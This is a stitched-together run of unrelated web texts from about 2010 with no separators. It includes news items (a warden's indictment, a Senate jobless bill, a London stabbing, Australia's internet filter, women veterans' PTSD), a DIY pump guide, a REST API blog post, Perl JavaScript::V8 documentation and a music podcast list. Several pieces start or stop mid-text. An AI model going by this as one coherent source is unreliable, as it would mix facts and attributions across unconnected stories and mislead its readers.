Scott A. Holencik , warden of a Federal Bureau of Prisons facility in Adelanto , is charged in a six - count indictment , which includes two felony counts of making false statements to investigators , according to the U.S. Attorney 's Office in Los Angeles .
Holencik , 45 , is accused of lying to investigators from the Justice Department 's Office of the Inspector General last year in connection with a probe into Internet postings that disclosed confidential information .
If convicted of all counts , Holencik faces a maximum of 14 years in federal prison , the U.S. Attorney 's Office said .
[ For the record : An earlier version of this story incorrectly said the prison was in Riverside County .
It is in San Bernardino County . ]
-- Scott Glover
More breaking news in L.A. Now :
L.A. mayor finalizes first list of city job cuts
Prosecutors decline to charge paparazzi arrested during ' Bachelor ' taping
Body of newborn found by trash collector in Redondo Beach
Man sentenced for taking kickbacks at Los Angeles Air Force Base
L.A. County probation workers elude punishment for misdeeds
Michael Jackson 's children never in any danger from stun gun , attorney says
Woman slain by gunfire in Lancaster
LAPD apologizes to family of slain Sen. Robert F. Kennedy for homicide exhibit items
Now you have where you are going to put your plants , you can lay out the watering system .
1 . Get a big barrel i had this laying around my house .
Cut a hole into it big enough for the sub - pump to fit through .
2 . Get a sub Pump this i got at a local swap - meet for 25 dollars ( talked down from 45 ) .
It has a float shut off so if your water runs low it will stop , and not burn out your motor .
it is a 500w , the size and strength depends on how far your going to push the water .
This works more then enough for this project .
And get a " dirty water " model as supposed to a clean water one so it has little legs to stand on inside the bucket , and wont suck its self to the bottom burning out the motor .
3. Take you tubing or small garden hose and connect them to the sub - pump most fit a garden hose , but i wanted to 3 small tubes , so i jammed three hoses into the cap that screws onto the pump .
and filled it in with plumbers putty .
Electrical taped the whole thing .
I made these tubes just long enough to make it out of the barrel .
This was so its easier to screw back on to the pump .
4 . Put the pump tubing into the barrel fill barrel full of water ( test pump see if you did n't get ripped off )
The answer to Allen Iverson 's future with the Philadelphia 76ers is this :
He 's done with the NBA team for this season , according to the Philadelphia Inquirer .
A source close to the team made the disclosure after the Sixers fell to the Orlando Magic 126-105 on Monday , according to the newspaper .
Iverson has not played with the team since a Feb. 20 loss to the Bulls in Chicago , when he left to care for a sick child .
After Iverson , 34 , quit the Memphis Grizzlies in November , he retired then rejoined the Sixers .
The former Georgetown star spent 10 - plus seasons in Philly starting in 1996 - 97 and was named the NBA 's MVP in 2001 .
He 's averaged 26.7 points in 14 seasons that included stops in Denver and Detroit before the brief tenure in Memphis .
- Bob Kimball
Jobless claims bill OK'd by Senate
NEW YORK ( CNNMoney.com ) --
The Senate on Wednesday approved a wide - ranging bill that would push back the deadline to file for extended unemployment insurance until year - end and extends dozens of expired tax breaks .
The bill , passed by a 62 - 36 vote , is the latest job creation effort to go before lawmakers , though it contains virtually no new initiatives to boost employment .
Its price tag has wavered between $ 140 billion and $ 150 billion , which is partially offset .
Its next stop is the House , where a quick passage is anything but assured .
Lawmakers have come under pressure from both the White House and unemployed Americans to do more to spur hiring .
But after many speeches , officials have enacted little to help the nearly 15 million looking for work .
The latest efforts -- which include a $ 15 billion job creation initiative that the Senate will take up next -- do n't sit well with members from either side of the aisle .
Some say that more must be done to boost employment .
Others , particularly Congressional Republicans , have voiced concerns about adding to the deficit .
While the House passed a comprehensive $ 154 billion job creation bill in December , the Senate has opted to address the unemployment issue with a series of smaller measures .
Senate Majority Leader Harry Reid , D - Nev. , has said he will soon unveil additional efforts , including those aimed at small businesses .
In this bill
The bill passed Wednesday would push back the deadline to file for extended jobless benefits and the federal subsidy for COBRA health insurance until Dec. 31 .
Federal unemployment benefits kick in after the basic state - funded 26 weeks of coverage expire .
These federal benefits , worth up to 73 weeks , are divided into tiers , and the jobless must apply each time they move into a new tier .
The measure would also extend dozens of tax provisions -- including allowing teachers to deduct education expenses and providing businesses a research and development credit -- that expired at the end of last year .
" Getting Americans back to work is a critical priority and extending the tax cuts and benefits in this bill will help build the stable environment we need for job creation , " said Senate Finance Committee Chairman Max Baucus , D - Mont. , who co-sponsored the bill .
It would also temporarily halt a 21 % reduction in Medicare physician reimbursement rates .
And it would send another $ 25 billion to the states to help them fund their Medicaid programs for another six months .
The bill also extends two Recovery Act provisions for small businesses .
It provides $ 354 million to continue funding the increased Small Business Administration guarantee and fee waiver through year 's end .
Next up
Next up is a $ 15 billion bill that would :
-- Exempt employers from Social Security payroll taxes on new hires who were unemployed .
-- Fund highway and transit programs through 2010 .
-- Extend a tax break for business that spend money on capital investments , such as equipment purchases .
-- Expand the use of the Build America Bonds program , which helps states and municipalities fund capital construction projects .
The Senate already passed this measure , but then the House amended it last week , sending it back to the Senate .
Should it pass again , this time unchanged , the bill would go to President Obama for his signature .
Those of you plugged into the REST world have most likely seen at least one of Roy T. Fielding ’s rants on “ REST ” implementations out in the wild ( one of the best known being this one ) .
While there are a number of reasons why an API might not technically fit the definition of REST , I have come to observe one incredibly commonplace “ REST ” design - pattern that is far and away the most common way in which APIs are only sort - of RESTful .
I have also come to observe the reasons why ( and they are fascinating … read on ) .
The vast majority of REST - like APIs I see follow a distinct pattern of being RESTful on reads ( GETs ) and not so RESTful with all other operations .
Often you will see the following :
The API supports the HTTP GET method for lookups and searches supporting a variety of output formats such as XML , JSON , YAML , etc… Pretty RESTful so far .
The API utilizes the HTTP POST method for creating and , updating resources using POST name / value pairs ( vs. via data in the request body ) .
Not so RESTful .
The API does not support the HTTP PUT method .
Typical PUT operations are implemented with POST as described above .
Not so RESTful .
The API may or may not support the HTTP DELETE method .
When it does not , delete operations are usually implemented with a specific “ delete ” URL , perhaps with query parameters , and the HTTP GET method .
In essence , the API is written such that reads ( lookups and searches ) are done in a REST style but writes ( inserts and updates ) are done in more of an RPC style .
Instead of a POST or PUT with something like the following in the request body :
< contact > < first- name > John </ first - name > < last - name > Smith </ last - name > . . . </ contact >
we more often see a POST ( or sometimes even a GET ( ouch ! ) ) that looks something like this :
http://.../add-contact?first-name=John&last-name=Smith&...
So the big question is why .
Why do such an overwhelming number developers naturally drift towards API designs like we just described ?
Are all those developers really lame ?
Probably not , and if we examine the problem more carefully we can see at least two very compelling reasons why :
The current architecture of HTML forms greatly encourages an RPC style API .
Very often you would like to interact with an API via an HTML form .
What ’s easier , creating a form that submits a set of name / value pairs via POST ( i.e. the standard way we use HTML forms ) , or writing Javascript code that bypasses the standard forms submission behavior and instead packages all form contents into a JSON object ( or XML document ) and POST / PUTs it to the server ?
No brainer .
The second path has too much friction , and is much more work .
Someone really should create a Javascript library to do just this .
Maybe I will break down and write it eventually ( and post it for y’all ) .
I believe that this alone would help tremendously in the adoption of more RESTful API designs across the land .
( If any reader knows of the existence of such a library please do let me know ) .
Of course , all of this is in addition to the lack of support many browser have for the HTTP PUT and DELETE methods ( but this is changing )
It is currently much easier to support multiple payload formats ( XML , JSON , YAML , etc … ) using the RPC style .
Implementing a real REST API would require server code to parse data from POSTs and PUTs in each supported format ( XML , JSON , YAML , etc… ) .
Too much work for most .
If you write an API that ( a ) supports multiple formats on GETs and ( b ) implements POST / PUT with name / value pairs via HTTP POST , then you can say you support multiple formats with a straight face .
It is really the state of our software infrastructure , languages , and frameworks that encourage the web API designs we are seeing out there .
We need to collectively do a little work to make it less painful to implement and use truly RESTful APIs by providing some client and server frameworks that make full REST just as easy as the half REST we are seeing out there .
Free Download
Share
Tree of Life is a collaborative project by Wellcome Trust , BBC , and The Open University .
It aired on BBC1 in early 2009 as part of BBC ’s Darwin season .
It serves as homage to Charles Darwin , whose 200th birth anniversary falls in 2009 .
In Darwin ’s “ On the Origin of Species , ” he used the term ‘ tree of life ’ to describe the evolutionary relationships between all living things on Earth .
The collaborators intended to produce an updated version of the Tree of Life , created by Shadow Industries .
Sir David Attenborough narrates this six and a half minute video , which invites you to “ see how living things are related . ”
A hundred and fifty years since the publication of Darwin ’s book , everyone now gets a chance to spread knowledge and information on the history of the planet Earth .
The video is licensed under Creative Commons , and you are encouraged to make your own version of the video with Wellcome Trust ’s remixable files .
The project has used cutting - edge technology to present the latest scientific knowledge and produce a “ visually stunning , fully accessible and scientifically accurate interactive Tree of Life . ”
Even individuals who are not inclined to super - analyze the great history of life ( such as myself ) will find this video to be very interesting , to say the least .
This is perhaps the most technically elaborate video ever produced to illustrate the history of our planet .
I ’d recommend this to friends , especially those who are into video production and those who work in the academe .
Related Links :
Video Transcript
Discuss Darwin and evolution
The Tree of Life Interactive
This work is licensed under a Creative Commons Attribution - Noncommercial - Share Alike 3.0 United States License .
You know that whole conversation about how women do n’t go to the movies and are not a film market ?
You know that conversation that we hear over and over as the big reason why we are inundated with crappy boy films week in and week out .
Well thanks to the statistics that we released by the MPAA with barely a blip yesterday , ( thanks David Poland for the heads up ) the news is that not only do women go to movies , we go more than men .
Yes , folks — women go to the movies more than men do .
This news should rock each and every executive in Hollywood more than the Bigelow Oscar win .
Cause this is something they understand .
This is money and women are delivering the money .
Big time .
So I am officially holding a funeral for the term “ women are not a film market . ” I never want to hear it uttered again .
I am going to keep these statistics next to my computer ( or maybe make them my screensaver but that would mean removing my picture of Kathryn Bigelow holding two Oscars ) because every time someone says that women do n’t go to the movies I ’m just going to throw the stats in their faces .
I know exactly why the 2009 numbers increased .
If you follow the business it ’s not too hard to figure it out .
The reasons are New Moon and The Blind Side with a side of The Proposal ( now Sandra Bullock ’s Oscar makes even more sense . )
Maybe folks are going to try and say that it is a fluke because there were two female centric successes and we do n’t have those frequently .
Friends , that is the whole fucking point .
It ’s like that line from Field of Dreams — “ if you build it they will come . ”
It is only looked at as a fluke because of the shortsightedness of people who wo n’t believe that women will continue to go to the movies .
There is nothing in any of the data that I have looked at the gives me any indication that women wo n’t go to the movies in the future .
In fact , I would venture to say that if they continue to make movies that attract women we will continue to be there .
Another line that I want to bury for good is that young men go to the movies more than anyone else .
That ’s just bullshit .
Younger men do n’t go to the movies more than younger women .
Younger people in general go to the movies more , but based on the MPAA numbers of frequent moviegoers ( ones who go more than once a month ) in the coveted demographic of 18 – 24 , women make up 3.4 million filmgoers while men make up 3.1 million .
Suck on that Hollywood !
Do n’t believe me , check out the numbers from the MPAA
Here are the other stats :
In 2009 there were 217 million moviegoers .
The total admissions was 1.4 billion dollars .
Women are 113 million of the moviegoers and bought 55 % of the tickets .
Men are 104 million of the moviegoers and 45 % of the tickets .
Here ’s the money quote from the MPAA :
“ A higher percentage of women than men are moviegoers in all categories of frequency . ”
In . All. Categories . of .
Frequency .
Women make up 9 million more filmgoers than men .
Bottom line :
The future is female .
The upside is great .
The market is there ready to be tapped .
The only issue is who will take advantage of it .
Boyfriend facing murder quiz ' met schoolgirl knife victim on Facebook '
Tributes : Aliza Mirza , 18 , is said to have kept a relationship secret from her strict Muslim parents
A schoolgirl stabbed to death on her way to a party had a ' secret ' ex-boyfriend she met on Facebook , it emerged last night .
Aliza Mirza , 18 , kept the relationship from her strict Muslim parents because she feared they would disapprove , friends said .
Last night police were still questioning 17 - year - old Yahya Gul , believed to be the ex-boyfriend , on suspicion of murder .
Several members of his family are also being held .
Aliza was knifed in the neck and left to die on a pavement on Saturday evening .
On Facebook Gul called himself ' Geeneral Yahya ' and listed his religious views as ' Muslim till I die and here after ' .
Friends said he had become extremely religious since dropping out of school because of non-attendance .
He had started wearing traditional robes and grew a beard .
Ali Razza , 18 , said : ' I was friends with both of them , I got to know him through her .
' They met through Facebook and carried on from there .
Her family were very strict , so the relationship was a secret . '
Aliza 's distraught family yesterday paid tribute to the ' diamond daughter ' who would do anything for them , but insisted she ' never had a boyfriend ' .
Breaking down at the family home in Ilford , East London , her father Munir Mirza said : ' She was pretty , intelligent , she had very bright future .
She was very interested in the media .
She wanted to be a journalist .
' She was a brilliant girl and she had all the qualities that a daughter should have . '
Grief : Friends of Aliza leave flowers at the scene of her murder in Manor Park , London , yesterday
Grim discovery : Aliza was left for dead on a street near Manor Park in east London .
She died later in hospital
The last time Mr Mirza saw his daughter was when she asked to borrow some money to buy her friend a present ahead of the party .
' She left here to go to the party at 5 pm , ' he said .
' At 8.30 pm the police came here and said she was in hospital and we should go there .
' Then ten minutes later they phoned and said she was dead .
We were too late . '
He added : ' We never heard anything about her having a boyfriend .
We did n't know anything like that , nothing at all .
She never had a boyfriend .
' She was a diamond to me and my family .
She was everything to me , to her uncles , aunts , the whole family .
Everyone loved her so much .
' We are not going to touch her room , her laptop , nothing .
It will all stay as it is .
' We want to do that for her .
Whoever did this should get punishment from the courts . '
Hunt : Forensics officers carry out a search at the scene of the attack
Aliza 's uncle , Waqar Ahmed , 43 , said : ' I just can't imagine why anyone would want to kill her .
' She 's not someone who could harm anyone , she was very petite , very small .
She was really fun-loving . '
Aliza , who had two brothers and two sisters , was studying ICT , English , government and politics and media at Canon Palmer School in Ilford .
Yahya Gul 's 45 - year - old father Ilham is also being questioned on suspicion of murder .
Gul 's mother Suraya and his 20 - year - old sister Sara are being held on suspicion of assisting an offender , along with another man aged 42 .
Neighbours said Sara Gul was due to be married today and that relatives started arriving at the family home yesterday morning oblivious to the arrests .
Detectives have recovered a weapon which they believe was used to carry out the stabbing .
They spent yesterday searching the Victorian house rented by the Guls .
The ever - evolving automotive industry constantly has something new coming up .
These changes are , of course , the results of intensive research and development .
The developments in the automotive sector are in response to the requirement and needs of the current age .
So what are the developments currently ruling the automotive industry ?
Let ’s drive you through !
3D Printing
This technology has ventured successfully into all sectors , and the automotive industry is no behind .
The automotive industry was quick to research and understand how 3D printing could be integrated into the sector seamlessly to increase efficiency .
And yes , they have done it quite effectively !
3 Dprinting has brought a change in the way cars will be designs in the future .
The introduction of 3D printing in the automotive sector will drastically reduce the amount spent on repairs caused due to accidents and impacts .
Autonomous Driving
Who needs to take the effort to drive and be high on alert while driving when you can easily have a driverless car do it for you ?!
Almost all the leading names in the automotive sector have their versions of driverless cars all set and ready .
Though these have n’t hit the streets as yet , they are being test driven all over the world .
Whether or not the world , the roads , the infrastructure – is ready for these autonomous cars or not is something that only time will tell .
So let ’s wait and watch how this innovative and exciting trend takes on !
Electric Cars
Another trend that is now fast catching up with the world is the electric car !
Cost - effective and environmentally friendly , these cars are winning hearts across the world and are finding ample takers too .
People seem to be intrigued by this concept , thus making it all the more popular .
Many countries are encouraging their citizens to switch over to electric cars in the urge to control pollution levels by reduced fuel emissions .
Few have even started programs to ensure the entire country turns to electric vehicles .
The immense benefits these cars come up with have guaranteed them a bright future !
Blockchain Technology
No , Blockchain is no longer limited to cryptocurrencies only – it has spread far and wide , and the automotive industry has caught the ‘ blockchain wave ’ too !
The Blockchain technology is being optimally used by the automotive sector to effectively deal with the issue of fake parts being sold across the world by fake dealers .
The Blockchain technology effectively manages to keep the authenticity of both brands and sellers intact .
WASHINGTON — The Supreme Court seemed likely to rule for the first time that gun possession is fundamental to American freedom , a move that would give federal judges power to strike down state and local weapons laws for infringing on Second Amendment rights .
At oral arguments Tuesday , the court considered whether its 2008 decision voiding the District of Columbia handgun ban should be extended to the rest of the country .
Because Washington is federal territory and not part of a state , the legal basis for imposing federal constitutional ...
NAME
JavaScript::V8 - Perl interface to the V8
SYNOPSIS
use JavaScript::V8 ; my $ context = JavaScript::V8 :: Context ->new ( ) ; $ context -> bind_function ( write => sub { print @_ ; } ) ; $ context - > eval ( q / for ( i = 99 ; i > 0 ; i--) { write( i + " bottle (s ) of beer on the wall , " + i + " bottle (s ) of beer
" ) ; write ( " Take 1 down , pass it around , " ) ; if ( i > 1 ) { write ( ( i - 1 ) + " bottle (s ) of beer on the wall . " ) ; } else { write ( " No more bottles of beer on the wall ! " ) ; } } /) ;
INSTALLING V8
See http://code.google.com/p/v8/issues/detail?id=413
if you are having trouble on gcc 4.4.1
svn checkout http://v8.googlecode.com/svn/trunk/ v8 cd v8 scons sudo mv include / v8.h / usr / local / include / sudo mv libv8.a
/usr/local/lib/
REPOSITORY
The source code lives at http://github.com/pmurias/javascript-v8.
AUTHORS
Pawel Murias < pawelmurias at gmail dot com >
COPYRIGHT AND LICENSE
Copyright ( c ) 2009 Paweł Murias
This library is free software ; you can redistribute it and / or modify it under the same terms as Perl itself
ACKNOWLEDGMENTS
Claes Jakobsson < claesjac at cpan dot org >
I stole and adapted pieces of docs and API design from JavaScript.pm Brian Hammond < brain @ fictorial dot com >
For salvaging the code of V8.pm from a message board ( which i took some code and the idea from )
The hacker who wrote V8.pm and posted it on the message board ( http://d.hatena.ne.jp/dayflower/20080905/1220592409)
All the fine people at #perl@freenode.org for helping me write this module
Senator Stephen Conroy Senator Conroy also brushed aside concerns from leading academics and technology companies that the plan to block a blacklist of " refused classification " ( RC ) websites for all Australians was an attempt to shoe - horn an offline classification model into a vastly different online world .
" Why is the internet special ? , " he asked , saying the net was " just a communication and distribution platform " .
" This argument that the internet is some mystical creation that no laws should apply to , that is a recipe for anarchy and the wild west .
I believe in a civil society and in a civil society people behave the same way in the physical world as they behave in the virtual world . "
Newton said this was a " gross oversimplification " , pointing out that Australia Post and Telstra 's telephone network were also distribution platforms but were not censored .
" Why should the internet , a distribution platform for all manner of intangibles , be censored as if it was a movie theatre ?
It makes no sense , the model does n't fit , " he said .
The Greens communications spokesman Scott Ludlam was also quick to ridicule Senator Conroy , saying books and films were distinctly different because they are " dicreet , physical packages of content " , whereas the internet is dynamic and has " a trillion web pages already indexed and an unknown amount more added every day " .
" To characterise sustained opposition by individuals and groups as diverse as EFA , Google , SAGE , Yahoo , Save the Children , Reporters without Borders , Justice Kirby , Choice Magazine , leading online academics and industry associations and the United States Department of State as ' an organised group in the online world ' is a remarkably naive misreading of how unpopular this proposal is , " Senator Ludlam said .
University of Sydney associate professor Bjorn Landfeldt said the difference between submitting a book for classification and having an organisation classifying and blocking websites without anyone 's knowledge was that , in the book case , " it is well known that the book was censored and there can be a debate about the correctness of the decision " .
Landfeldt said it was true that the filter system would block all websites it was told to block but the trillions of pages on the internet means the government will not make the internet a safe place for children and will only be able to stop access to " a small minority " of web pages .
Senator Conroy said the aim of his policy was to " ensure that particularly children ... do n't stumble across this material " , which he described as being child pornography , bestiality , extreme violence and pro-rape websites .
He neglected to address widespread concerns that the " refused classification " rating also applies to sexual health discussions , euthanasia material such as the Peaceful Pill Handbook , historical war footage and instructions in minor crimes such as graffiti .
Senator Conroy admitted that his filters would not do anything to stop the spread of child pornography on peer - to - peer file sharing networks , and that they will " slow down the internet " if applied to high - volume sites such as YouTube , Facebook and Wikipedia .
He mentioned he was in discussions with Google over a way for the company to apply the filter to YouTube but Google has already rejected these requests .
" If we know there are 355 websites today that have child pornographic images on it , should we say well we 're not going to do anything about it ? , " he said .
Colin Jacobs , spokesman for the online users ' lobby group Electronic Frontiers Australia , said this comment ignored evidence that the overwhelming majority of child pornography was traded in others ways such as by peer - to - peer .
It also ignored the fact that anyone who wanted to bypass the filters could do so quite easily .
Senator Conroy has been on the attack against Google after the search giant issued a withering critique of his policy .
After questioning the company 's credibility in an ABC Radio interview on Monday night , he fired off another broadside in yesterday 's interview .
He said Google already censored more material than the Rudd Government was proposing to block with its filters , pointing to its blocking of R-rated and X - rated material on YouTube and its censorship of search results in Thailand that are critical of the Thai king .
" Google are welcome to their view but Google have got to be prepared to be consistent , " said Senator Conroy .
Jacobs said suggesting that enforcing YouTube 's terms of service was equivalent to state - sponsored censorship was " at best misleading " .
Senator Ludlam said Senator Conroy 's attacks on Google were " a deliberate misdirection of the debate " , while Jacobs said they " smack of a personal vendetta " .
Senator Conroy also rejected concerns that the government was creating a new mandatory censorship mechanism that would be prone to abuse by future governments .
" I think in Australia we have a vibrant democracy and anyone who wanted to try to expand beyond existing banned material - RC - would have one hell of a fight on the floor of Parliament , " he said .
Asked whether it was a fact that the blacklist , a catalogue of some of the worst websites , was likely to leak at some time in the future , as has occurred in a number of other countries , Senator Conroy responded : " so the alternative is just to leave them out there and do nothing ? " .
He said he realistically would not expect to see legislation enabling the filters to be introduced before the second half of the year , after which it would " go through an open and transparent consultative process " .
" For $ 44 million , we 're buying ourselves an initiative which will have no measurable impact whatsoever , " Senator Ludlam said .
" In exchange , we establish the architecture for future governments to abuse the loose and undefined ' RC ' category to add a creeping range of material to the list .
Once this architecture is established , the idea that its scope wo n't be expanded by future governments is a gamble we do n't believe we should take . "
La violencia que padecen estados vecinos podría trasladarse a la ciudad de México , advierten
La delincuencia recurre a células operativas , bloqueos , narcomantas y guerra sicológica vía Internet
Este abril , el más sangriento de los últimos cuatro años , con 820 personas muertas
Spring is drawing nigh , and all the musician types are preparing to emerge from their dens of iniquity with new releases .
This week we bring you brooding electronic beats from Flying Lotus and fellow Warp Records 8 - bit artisan EPROM .
Playlist Podcast : Episode 20 https://downloads.wired.com/podcasts/assets/playlist/Playlist0020.mp3
We also check in on the latest project from DJ - cum - super - indie - producer Danger Mouse , and leave the sheen behind with some decidedly coarser , throwback sounds from Dr. Dog and Harlem .
All artists featured in the podcast , with the exception of EPROM , have records due in April or May .
Who : Flying Lotus
Song : “ Bonus Track ”
Album : Reset
We open this week ’s podcast with a jam from Flying Lotus , whose latest effort , Cosmogramma , drops May 4 on Warp Records .
This bass - heavy bonus track comes from his Reset EP , which came out in 2007 .
The artist describes his forthcoming LP as a “ space opera , ” replete with the usual heavy - handed beats but wider in scope and more ethereal than previous releases .
Who : Broken Bells
Song : “ High Road ”
Album : Broken Bells
Over the past six years , Danger Mouse has transitioned from a struggling DJ to the go - to producer for all things indie .
After dropping The Grey Album , he crafted the beats for MF Doom ’s Adult Swim collaboration DangerDoom , engineered Gnarls Barkley ’s phenomenal 2006 crossover success and manned the boards for The Black Keys and Beck .
Now he and The Shins’ James Mercer have co-founded Broken Bells ( pictured right ) .
The band ’s self - titled Columbia Records release drops March 9 .
Who : Dr. Dog
Song : “ Army of Ancients ”
Album : Fate
Dr. Dog ( pictured top ) has always betrayed a sentimentality for player - piano saloon romps and groove - heavy psychedelia , as in this track from 2008 ’s Fate .
The Philadelphia five - piece will make its Anti- Records debut April 6 with Shame , Shame .
We ca n’t play that for you yet , although we ’ve been enjoying our press copy immensely .
For now you can listen “ Army of Ancients ” from Dr. Dog ’s fourth LP , the final recording on their former Park the Van label .
Who : Harlem
Song : “ Friendly Ghost ”
Album : Hippies
It is often said that those who do n’t learn from history are doomed to repeat it .
Well , those who do learn from history are often equally blessed to repeat it .
Such is the case with Austin , Texas , trio Harlem , whose style of sweetly off - kilter garage rock has seen a successful resurgence of late in other groups such as The Black Lips and The Strange Boys .
This song comes from Harlem ’s sophomore LP , Hippies , out April 6 on Matador .
Who : EPROM
Song : “ Hendt ”
Album : Hendt / Lands and Bones split single
We close this week ’s podcast in the same vein as we opened it , with psych - dance punks ( and Flying Lotus label mates ) EPROM .
The band ’s Hendt / Lands and Bones , a double A - side 12 - inch split with Eskmo , came out last month .
Here we play “ Hendt ” from the EPROM side of the Warp Records release .
Bask in its 8 - bit glitches and reminisce about simpler times , when your biggest worries revolved around Battletoads and Contra .
Dr. Dog photo courtesy Anti- Records
See Also :
March 2 , 2010  --
The first day Kristine Wise returned from eight months military service in Iraq , she knew something was wrong .
Driving from San Diego to Bakersfield to see her brother , the road signs triggered flashbacks .
" One said ' railroad , ' but instead I saw ' roadside ' and in my mind a roadside bomb , " said Wise , who supplied parts to combat vehicles in the first wave of the war .
" I would see ' beware ' and my mind would see ' Baghdad . '
I could n't explain it . "
The depression and panic attacks began long before her honorable discharge in 2004 , but the battle to get the Department of Veterans Affairs ( VA ) to take her symptoms seriously was just as difficult .
" They had a hard time comprehending I was a combat vet and did n't treat me with the same respect , " said Wise , now 40 and rated 10 percent disabled for post traumatic stress disorder .
Wise is one of more than 230,000 women -- about 11 percent of the U.S. military -- who have served in Iraq and Afghanistan .
As of the third quarter in 2009 , the VA reported that 11,713 of the women evaluated received a diagnosis of post traumatic stress disorder ( PTSD ) .
Women have experienced the same psychological and emotional trauma as their male counterparts , but the VA has only begun to pay attention to their gender - specific needs , according to to " Combat to Community , " a 2009 report conducted the veterans ' advocacy group , Swords to Plowshares .
The number of women in all branches of the military has doubled in the last 30 years , and is expected to double again in the next decade , the VA estimates .
Women are enrolling in VA healthcare at " historical rates , " about 44 percent of all Iraq and Afghanistan war veterans , but say they face roadblocks to good care .
" In case after case , Jack and Jill were both deployed and were in the same fire fight , " said Tia Christopher , a Navy veteran from Washington state , who is being treated for PTSD caused by sexual assault .
" He 's decorated and she 's not because she 's in support instead of in combat , " she said .
These veterans are also plagued with problems unique to their gender -- sexual harassment , guilt over leaving children behind and a more difficult time transitioning back to civilian life , according to Christopher , an associate for the Iraq Veterans Project .
They are younger than their male peers -- more than 66 percent of all females seeking care are under 30 , according to the VA .
And some say that exposure to war conditions can also compromise their reproductive health .
Kristine Wise said she went into " out - of - control stress mode " shortly after she arrived in Kuwait in 2003 , where desert temperatures soared to 120 degrees and mortar fire hit several times a day .
Later , on convoys with combat troops in Baghdad , she witnessed repeated rocket grenade attacks .
While stationed at the airport , 20 rounds of mortar fire hit a day .
" I can hear it in the air , like a whirling sound , whistling , " she said .
Even today , she can't cope with California 's summer heat .
" It was so intense over there and sometimes I panic , " said Wise .
" It 's like a part of my body is burning . "
PTSD Hurdle Harder for Women
Because women technically service in combat support roles , it 's harder for them to substantiate claims of PTSD .
" They experience as much in combat , " said Colleen Corliss , spokesman for Swords to Plowshares , which helps veterans transition back to their communities .
" A male goes to fill out a claim to get treatment and he has 23 to 28 pages to fill out .
For women there are additional steps , ridiculous red tape for someone who is having severe symptoms focusing . "
" Even sitting down in the clinic for awhile is traumatic , " she said .
" Women have to identify a particular moment or instance that triggers that type of emotions . "
For the last two years , Congress has been pushing the VA to respond to the special needs of women .
At least three bills call for larger studies on women who 've served in Afghanistan and Iraq to find out how war affects their physical , mental and reproductive health , including one by Sen.
Patty Murray , D - Washington .
Combat - related stress is only part of the problem for women .
In 2008 , the VA reported that 1 in 5 women screened were found to have military sexual trauma and 60 percent of them develop post - traumatic stress .
Those who experience sexual abuse PTSD get a " double whammy , " according to Christopher , who testified before Congress last year .
She was assaulted in language school during Navy training after signing up in 2000 , but her assailant was found not guilty .
" I was raped in the barracks room , " said Christopher .
" My rapist raped several other women -- that 's why I came forward .
During the whole investigation and afterward , I had to live and work with him and they kept me in the same barracks room where it happened .
Then he began to stalk me . "
" I kept fighting it up the chain of command and it's my opinion they tried to make an example of me , " said Christopher , now 28 .
" They thought it was a game -- that I was just making it up . "
Christopher told Congress the male - dominated culture in VA facilities makes it doubly hard for women who have been traumatized to feel comfortable seeking treatment .
In most clinics , female veterans must share facilities with men -- even those who have experienced sexual trauma .
When Christopher first went to the VA , she brought along note cards with questions because she was so nervous about interacting with male doctors .
" I 'd have to walk through the halls with all men and get hassled , " she said .
Christopher said the VA has " come a long way , " since she was honorably discharged in 2002 , but just a handful of mental health clinics serve only women .
Today , she is doing well with a female therapist and credits the help she eventually found within the VA .
" I 've had good and bad experiences , " she said .
Soldier to Wife Transition Hard
Williams , now 33 , chronicled her five years of service in the book , " Love My Rifle More Than You : Young and Female in the U.S. Army . "
Working alongside infantrymen on combat patrols , Williams was part of a quick - reaction force that resulted in the death of one and 10 injured .
" I watched someone bleed to death and it was probably the most intense and difficult day for me , " she said .
" For several months after the experience and again when I came home I had intrusive image of that day , " said Williams .
" I had trouble sleeping and lost my temper easily and was startled by loud noises . "
Those symptoms eventually faded , but coping with the transition from soldier to civilian took a toll .
" I was also becoming the wife of a combat wounded veteran who was struggling with cognitive and psychological injuries , " she said .
" Instead of just worrying about my own challenges , I also had to try to help him overcome his own . "
When she first returned to Washington , D.C. in 2005 , few services catered to women veterans .
" It would have been great if they could have pointed me toward resources that would have helped me -- like counseling , " she said .
Williams also worries about the environmental effects of war .
The couple tried to conceive for two years without success .
" Most of us were exposed to burning trash and burning plastic , feces and dead animals , " she said .
" Sometimes it 's human medical waste .
I am not sure what combination of chemicals might have affected me , but I worried about the burning plastic . "
After several negative encounters with the VA , Williams eventually found good care in a specialized women 's unit in West Virginia .
" Women should be able to seek help in a community of their own peers , " she said .
" By and large the VA does a pretty good job , " said , who used the GI BIll to go to graduate school and now works at defense - related think tank .
" But male and female disparities need to be addressed . "
The VA , which serves 1.8 million females out of 8 million total veterans , has said it has heard these women and has already set in place a number of changes at its 153 hospitals and 783 outpatient clinics across the country .
One important step was staffing every VA medical center with a women veterans program manager and educating more doctors in female health .
" " Now there is a national movement to raise the standard of comprehensive care for women vets at all facilities , " said Dr. Laura Herrera , the VA 's director of Women 's Comprehensive Health .
" Unfortunately , we are the largest health care system in the country and educating and providing resources is taking some time , " she said .
" But we are moving in that direction . "
Women Are 14 Percent of All Vets
The VA is working " fast and furious " to provide specialized care for women , she said , updating services that were established for women in 1988 , when they represented only 4.4 percent of the veterans ' population .
" Getting people to think of women as part of military service is hard , " said Herrera .
" It is pervasive throughout the country and not just the VA system .
We are working hard to educate the American public the role women service in the armed forces . "
Recent initiatives include programs to provide comprehensive primary care and enhanced mental health services for women and the create better education programs in women 's health for physicians .
The VA is also supporting a multifaceted research program on women 's health .
The VA also cites its Center for Women Veterans as a resource .
Herrara said one priority was to create better outreach to help women navigate the system .
" The care provided is some of the highest quality care in the country , not just in the VA , " she said .
" People want to get home and do n't listen to the briefings .
They do n't necessarily know what the VA can do for them and read stories that not so positive and they think they 're not going to get care .
Many women are missing out on the superior care we are providing for women . "
As for Kristine Wise , who is now five years into readjustment counseling at San Diego 's Veterans Center , she is now attending California State University San Marcos , getting her tuition paid by the VA .
There , she is studying human development and hopes to one day work with other female veterans , especially those deployed in war zones .
Wise was also able to receive two years of transitional housing from the VA .
Though she is still " hypervigilant , " her PTSD symptoms are much " milder . "
" I 've got the greatest counselor on earth , " said Wise .
" I can continue school and now with the housing program I have a place to live and continue school . "
Her advice to other women veterans is to " get mental health help right away . "
" I sought it out and was not ashamed to get it , " she said .
" A lot of women are ashamed because they are in the military and are supposed to be tough .
I just knew that I needed it and did n't want to suffer . "
For information about available services contact the Department of Veterans Affairs .
Those seeking support can contact " Swords to Plowshares " for their list of national resources .
